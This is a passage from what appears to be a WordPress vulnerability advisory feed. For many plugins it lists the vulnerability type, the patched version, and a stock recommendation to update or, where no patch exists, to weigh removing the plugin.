Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Cross-Site Request Forgery via route
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: YAWPP (Yet Another WordPress Petition Plugin)

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.5.12
Recommended Action: Update to version 1.5.12, or a newer patched version

Plugin: SpiderCatalog

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quick Event Manager

Vulnerability: Missing Authorization Checks
Patched Version: 9.7.5
Recommended Action: Update to version 9.7.5, or a newer patched version

Plugin: Email Template Designer – WP HTML Mail

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: LWS Hide Login

Vulnerability: Protection Mechanism Bypass
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Colibri Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.241
Recommended Action: Update to version 1.0.241, or a newer patched version

Plugin: Smart Forms – when you need more than just a contact form

Vulnerability: Missing Authorization
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Seraphinite Accelerator

Vulnerability: Reflected Cross-Site Scripting via rt
Patched Version: 2.20.29
Recommended Action: Update to version 2.20.29, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Cross-Site Request Forgery via init
Patched Version: 1.18.1
Recommended Action: Update to version 1.18.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated SQL Injection
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: WooCommerce Extra Cost

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce Vietnam Checkout

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Paytm Payment Donation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Rating-Widget: Star Review System

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcodes
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: UltimateWoo – The Ultimate WooCommerce Plugin with Unlimited Usage

Vulnerability: PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LeagueManager

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Wp anything slider

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 9.2
Recommended Action: Update to version 9.2, or a newer patched version

Plugin: WordPress Page Contact

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘bulkDelete’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: MP3-jPlayer

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: Button Widget Smartsoft

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Table Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Zoom

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Video Gallery

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Google Forms

Vulnerability: Cross-Site Scripting
Patched Version: 0.85
Recommended Action: Update to version 0.85, or a newer patched version

Plugin: multimedial images

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Share Boost

Vulnerability: Cross-Site Request Forgery via ‘syntatical_settings_content’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Stats-Dashboard

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via icon_color
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: WP SimpleMail

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Name Directory

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.25.4
Recommended Action: Update to version 1.25.4, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.6.12
Recommended Action: Update to version 7.6.12, or a newer patched version

Plugin: System Dashboard

Vulnerability: Missing Authorization to Information Disclosure (sd_db_specs)
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: weForms – Easy Drag & Drop Contact Form Builder For WordPress

Vulnerability: CSV Injection via Form Entry
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Orbit Fox by ThemeIsle

Vulnerability: Authenticated Privilege Escalation
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: Coupon Zen

Vulnerability: Cross-Site Request Forgery to Plugin Activation
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WooCommerce Login Redirect

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated Arbitrary File Creation
Patched Version: 2.21.0
Recommended Action: Update to version 2.21.0, or a newer patched version

Plugin: WP Simple Events

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Conditional Shipping for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Arbitrary File Upload
Patched Version: 6.6.1
Recommended Action: Update to version 6.6.1, or a newer patched version

Plugin: Slick Popup: Contact Form 7 Popup Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.15
Recommended Action: Update to version 1.7.15, or a newer patched version

Plugin: A WordPress Testimonial Plugin to Showcase Testimonial Slider, Testimonial Grid and More: Solid Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Double Opt-In for Download

Vulnerability: SQL Injection
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Ad Invalid Click Protector (AICP)

Vulnerability: Reflected Cross-Site Scripting and Cross-Site Request Forgery
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: wpCentral

Vulnerability: Improper Access Control to Privilege Escalation
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: AutomateWoo

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.7.2
Recommended Action: Update to version 5.7.2, or a newer patched version

Plugin: WP Booking System – Booking Calendar

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.18.1
Recommended Action: Update to version 2.0.18.1, or a newer patched version

Plugin: Ads by datafeedr.com

Vulnerability: Unauthenticated (Limited) Remote Code Execution
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: mypixs

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ElasticPress Debugging Add-On

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Missing Authorization to Plugin Cache Reset
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Word Balloon

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.20.3
Recommended Action: Update to version 4.20.3, or a newer patched version

Plugin: Beautiful Cookie Consent Banner

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.10.2
Recommended Action: Update to version 2.10.2, or a newer patched version

Plugin: WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin

Vulnerability: Unspecified Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: wp-guestmap

Vulnerability: Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CM Tooltip Glossary

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Carousel Slider

Vulnerability: Missing Authorization
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Social Photo Gallery

Vulnerability: Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpDataTables (Premium)

Vulnerability: Blind SQL Injection via start Parameter
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.30
Recommended Action: Update to version 2.4.30, or a newer patched version

Plugin: Database Browser

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Webmaster Tools Verification

Vulnerability: Missing Authorization to Arbitrary Plugin Deactivation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail Slider With Lightbox

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Image Title
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.0.1.9
Recommended Action: Update to version 5.0.1.9, or a newer patched version

Plugin: Software License Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.4.6
Recommended Action: Update to version 4.4.6, or a newer patched version

Plugin: Slider by Supsystic

Vulnerability: Missing Authorization
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Advanced Post Manager

Vulnerability: PHP Object Injection
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Reviews and Rating – Google Reviews

Vulnerability: Missing Authorization
Patched Version: 4.15
Recommended Action: Update to version 4.15, or a newer patched version

Plugin: Woocommerce Shipping Canada Post

Vulnerability: Missing Authorization
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Unprotected REST-API to Sensitive Information Disclosure
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Zoho CRM Lead Magnet

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.2.9
Recommended Action: Update to version 1.7.2.9, or a newer patched version

Plugin: WooCommerce

Vulnerability: File Deletion
Patched Version: 3.4.6
Recommended Action: Update to version 3.4.6, or a newer patched version

Plugin: Estatik Real Estate Plugin

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Missing Authorization
Patched Version: 8.3.0
Recommended Action: Update to version 8.3.0, or a newer patched version

Plugin: CloudNet360

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: File Gallery

Vulnerability: Remote Code Execution
Patched Version: 1.7.9.2
Recommended Action: Update to version 1.7.9.2, or a newer patched version

Plugin: Houzez CRM

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Connections Business Directory

Vulnerability: Authorization Bypass
Patched Version: 0.7.1.6
Recommended Action: Update to version 0.7.1.6, or a newer patched version

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Reflected Cross-Site Scripting via ‘post_id’
Patched Version: 118
Recommended Action: Update to version 118, or a newer patched version

Plugin: Who Hit The Page – Hit Counter

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add Multiple Marker

Vulnerability: Missing Authorization Checks to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Affiliate Super Assistent

Vulnerability: Cross-Site Request Forgery to Settings Update and Cache Clearing
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Forms Ada – Form Builder

Vulnerability: Reflected Cross-Site Scripting via ‘p’ parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Church Admin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.810
Recommended Action: Update to version 0.810, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Authorization Bypass
Patched Version: 3.0.10
Recommended Action: Update to version 3.0.10, or a newer patched version

Plugin: Custom Website Data

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Rename Media Files: Improve Your WordPress SEO

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: 4ECPS Web Forms

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.2.18
Recommended Action: Update to version 0.2.18, or a newer patched version

Plugin: AI Power: Complete AI Pack

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.13
Recommended Action: Update to version 1.8.13, or a newer patched version

Plugin: Solid Central – Site Management, Backups, Security, and Reporting

Vulnerability: Stored Cross-Site Scripting via packages
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Gallery with thumbnail slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: Branda – White Label & Branding, Custom Login Page Customizer

Vulnerability: IP Address Spoofing
Patched Version: 3.4.15
Recommended Action: Update to version 3.4.15, or a newer patched version

Plugin: Spacer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: mini-mail-dashboard-widget

Vulnerability: Cross-Site Scripting
Patched Version: 1.43
Recommended Action: Update to version 1.43, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Post Meta Change
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: PHP Object Injection via Shortcode
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: WP Adminify – Custom WordPress Dashboard, Login and Admin Customizer

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: JS Job Manager

Vulnerability: Missing Authorization
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.11
Recommended Action: Update to version 2.6.11, or a newer patched version

Plugin: ZhuiGe Official Website Mini Program

Vulnerability: SQL Injection
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: TC Custom JavaScript

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Cross-Site Scripting
Patched Version: 1.57
Recommended Action: Update to version 1.57, or a newer patched version

Plugin: Contact Form by WD – responsive drag & drop contact form builder tool

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.13.53
Recommended Action: Update to version 7.13.53, or a newer patched version

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: WP Reactions Lite

Vulnerability: Cross-Site Request Forgery via AJAX action
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Ninja Forms Google Sheet Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Missing Authorization to Captcha Setting Update
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Unauthenticated Blind SQL Injection via order_by Parameter
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: myEASYbackup

Vulnerability: Directory Traversal
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Reflected Cross-Site Scripting via Cookie Value
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Missing Authorization
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Genesis Simple Love

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Tables WordPress Plugin – Easy Pricing Tables

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Mail Subscribe List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via smlsubform shortcode
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: Export and Import Users and Customers

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: KB Support – Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin

Vulnerability: Missing Authorization to Authenticated (Subscriber+) User Data Retrieval
Patched Version: 1.5.89
Recommended Action: Update to version 1.5.89, or a newer patched version

Plugin: WP SEO Redirect 301

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Generate Images (AI) – Magic Post Thumbnail

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Cross-Site Request Forgery to Menu Template creation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: WP Word Count

Vulnerability: Missing Authorization via calculate_statistics
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Speed Optimization By Add Expires Headers & Optimized Minify Plugin

Vulnerability: Cross-Site Request Forgery via [placeholder]
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: WP User Merger

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: SQL Injection via id Parameter
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: reCAPTCHA

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Plugin Activation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Premium Courses & eLearning with Paid Memberships Pro for LearnDash, LifterLMS, Sensei LMS & TutorLMS

Vulnerability: Courses for Membership Add On <= 1.2.4
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Simple Video Embedder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Builder forms Addon For WordPress < 5.2
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: gistpress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: IRivYou – Import reviews from AliExpress and Amazon to woocommerce

Vulnerability: Cross-Site Request Forgery via saveOptionsReviewsPlugin
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Membership

Vulnerability: Privilege Escalation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media from FTP

Vulnerability: Directory Traversal
Patched Version: 9.85
Recommended Action: Update to version 9.85, or a newer patched version

Plugin: Hide My WP Ghost – Security & Firewall

Vulnerability: CAPTCHA Bypass in brute_math_authenticate
Patched Version: 5.0.26
Recommended Action: Update to version 5.0.26, or a newer patched version

Plugin: WP Google Fonts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.0.18
Recommended Action: Update to version 2.0.18, or a newer patched version

Plugin: Custom Share Buttons with Floating Sidebar

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Web To Print Shop : uDraw

Vulnerability: Unauthenticated Arbitrary File Access
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: SQL Injection
Patched Version: 5.8.3
Recommended Action: Update to version 5.8.3, or a newer patched version

Plugin: Easy Registration Forms

Vulnerability: Authenticated (Subscriber+) Information Disclosure via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Sensitive Data Exposure
Patched Version: 4.25
Recommended Action: Update to version 4.25, or a newer patched version

Plugin: HREFLANG Tags Lite

Vulnerability: Missing Authorization to Data Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shortcode Addons- with Visual Composer, Divi, Beaver Builder and Elementor Extension

Vulnerability: Authenticated Arbitrary Options Update
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Max Mega Menu

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Simple Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Widgets for WooCommerce Products on Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 6.0.10
Recommended Action: Update to version 6.0.10, or a newer patched version

Plugin: Ovic Product Bundle

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

